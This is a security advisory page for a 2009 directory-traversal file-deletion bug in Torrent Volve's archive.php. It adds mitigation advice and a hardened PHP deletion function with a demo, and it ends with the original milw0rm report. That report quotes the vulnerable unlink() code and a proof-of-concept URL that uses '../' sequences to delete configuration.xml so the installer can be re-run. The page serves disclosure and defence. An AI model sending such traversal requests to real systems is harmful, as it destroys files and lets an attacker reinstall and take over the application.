Vendor: Torrent Volve
Author: br0ly
CVSS: 7.5 (HIGH)
Title: Delete Arbitrary File
CWE: 22
Product Name: Torrent Volve
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

Torrent Volve

Torrent Volve's 'archive.php' deletes a torrent whenever the 'deleteTorrent' GET parameter is present: the raw parameter is appended to the per-user directory and handed straight to unlink(). Nothing rejects path separators or '../' sequences, so an authenticated user who requests archive.php?deleteTorrent=../../../config/configuration.xml removes a file outside their own directory. The advisory below shows the practical impact: deleting the configuration file lets the attacker re-run the installer. The original author notes that the issue requires register_globals to be enabled.

Mitigation:

Treat 'deleteTorrent' as a filename, never as a path: reject any value that differs from its basename() or that contains '/', '\' or a NUL byte, resolve the joined path with realpath() and confirm it still lies directly inside the user's own directory before calling unlink(). Since the advisory reports register_globals=on as a precondition, running with register_globals disabled is also advisable.
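The following PHP is an added example written for this page, not Torrent Volve's own code: a hardened replacement for the unlink() call quoted in the advisory, followed by a self-contained demonstration that feeds it the advisory's own traversal value. The function name safe_delete_torrent, the restriction to *.torrent filenames, and the directory layout the demo builds under the system temp directory (arranged so that ../../../config/configuration.xml resolves to a configuration file three levels above the user directory, as in the PoC) are all assumptions made for illustration.

```php
<?php
// Added example, not part of Torrent Volve. Replaces
//   unlink($userDir . '/' . $_GET['deleteTorrent']);
// with a function that only ever deletes a plain file inside $userDir.

/**
 * Delete a torrent file that lives directly inside $userDir.
 * Returns true on success; throws InvalidArgumentException for any
 * name that is not a plain, existing file in that directory.
 */
function safe_delete_torrent(string $userDir, string $name): bool
{
    // 1. The value must be a bare filename. basename() strips any
    //    directory part, so "../../../config/configuration.xml" differs
    //    from its basename and is rejected before touching the disk.
    if ($name === '' || strpos($name, "\0") !== false || $name !== basename($name)) {
        throw new InvalidArgumentException('invalid torrent name');
    }
    // Assumption for this example: the feature only manages *.torrent files.
    if (!preg_match('/^[A-Za-z0-9._-]+\.torrent$/', $name)) {
        throw new InvalidArgumentException('not a torrent filename');
    }

    // 2. Resolve both sides and require containment, so a symlink inside
    //    the user directory or an odd $userDir value cannot escape either.
    $base   = realpath($userDir);
    $target = realpath($userDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $target === false) {
        throw new InvalidArgumentException('no such torrent');
    }
    if (dirname($target) !== $base || !is_file($target)) {
        throw new InvalidArgumentException('path escapes user directory');
    }

    return unlink($target);
}

// Demonstration on a constructed, throwaway layout (assumed structure):
//   <root>/config/configuration.xml        <- what the PoC deletes
//   <root>/torrents/users/alice/           <- $userDir for this user
$root    = sys_get_temp_dir() . '/tv_demo_' . bin2hex(random_bytes(4));
$userDir = $root . '/torrents/users/alice';
mkdir($userDir, 0700, true);
mkdir($root . '/config', 0700, true);
file_put_contents($root . '/config/configuration.xml', '<configuration/>');
file_put_contents($userDir . '/example.torrent', 'd8:announce0:e');

$candidates = [
    'example.torrent',                       // legitimate request
    '../../../config/configuration.xml',     // the advisory's PoC value
    'missing.torrent',                       // well-formed but absent
];
foreach ($candidates as $candidate) {
    try {
        safe_delete_torrent($userDir, $candidate);
        echo "deleted:  $candidate\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: $candidate ({$e->getMessage()})\n";
    }
}
echo 'configuration.xml still present: '
    . (file_exists($root . '/config/configuration.xml') ? 'yes' : 'no') . "\n";

// Clean up the demo tree.
foreach ([$root . '/config/configuration.xml', $userDir . '/example.torrent'] as $f) {
    if (file_exists($f)) {
        unlink($f);
    }
}
foreach ([$root . '/config', $userDir, $root . '/torrents/users', $root . '/torrents', $root] as $d) {
    rmdir($d);
}
```

Run it with the php command-line interpreter: the legitimate torrent is removed, the traversal value is rejected at the basename check before any filesystem call, and the configuration file is still present afterwards. The realpath() containment check is what catches cases the regex alone would not, such as a symlink planted inside the user directory.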

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------

  Name : Torrent Volve
  Site : http://sourceforge.net/projects/torrentvolve/
  Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030

----------------------------------------------------------------------------------------------------

 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Delete Arbitrary file.
     
  Look at this in: archive.php; Lines 194 - 199

  if(isset($_GET['deleteTorrent'])) {
      // delete Torrent from file system
      // $_GET['deleteTorrent'] is joined to $userDir unchanged, so "../"
      // sequences walk out of the per-user directory before unlink() runs
      unlink($userDir . '/' . $_GET['deleteTorrent']);
      echo '  <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";
  }
 
  Then, after login, we can delete files; if you delete the configuration file, you can install the script again.
 

----------------------------------------------------------------------------------------------------

  P0c:
 
    http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml

  To install again go to:

    http://localhost/Scripts/torrentvolve/
   

  Note: needs register_globals=on.

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-11]